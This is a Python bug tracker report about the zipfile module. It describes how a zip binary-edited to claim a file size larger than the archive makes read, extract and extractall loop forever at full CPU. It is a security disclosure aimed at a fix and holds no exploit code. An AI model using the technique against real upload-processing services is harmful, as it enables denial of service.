New submission from Nandiya:

I am using the zipfile module on a webserver which provides a service which 
processes files in zips uploaded by users, while hardening against zip bombs, I 
tried binary editing a zip to put in false file size information. The result is 
interesting, when with a ZIP_STORED file, or with carefully crafted 
ZIP_DEFLATED file (and perhaps ZIP_BZIP2 and ZIP_LZMA for craftier hackers than 
I), when the stated file size exceeds the size of the archive itself, 
ZipExtFile.read goes into an infinite loop, consuming 100% CPU.

The following methods on such an archive all result in an infinite loop:
ZipExtFile.read
ZipExtFile.read(n)
ZipExtFile.readlines
ZipFile.extract
ZipFile.extractall


ZipExtFile.read1 silently returns corrupt data but does not hang.

Obviously the module doesn't need to bend over backwards to deal gracefully 
with deliberately and maliciously crafted input, since all the user hopes for 
is to bring the program crashing down, but the 100% CPU infinite loop is 
probably one of the less satisfactory possible failure modes. It should either 
raise an exception or do something like read1 and silently return corrupt data.

This is low priority except for security since unless a zip is maliciously 
crafted some kind of exception will almost certainly be raised due to a 
decompression or invalid zip exception.

----------
components: IO, Library (Lib)
files: malzip.py
messages: 206978
nosy: nandiya
priority: normal
severity: normal
status: open
title: zipfile - ZipExtFile.read goes into 100% CPU infinite loop on 
maliciously binary edited zips
type: security
versions: Python 2.7, Python 3.3
Added file: http://bugs.python.org/file33277/malzip.py

_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue20078>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

Reply via email to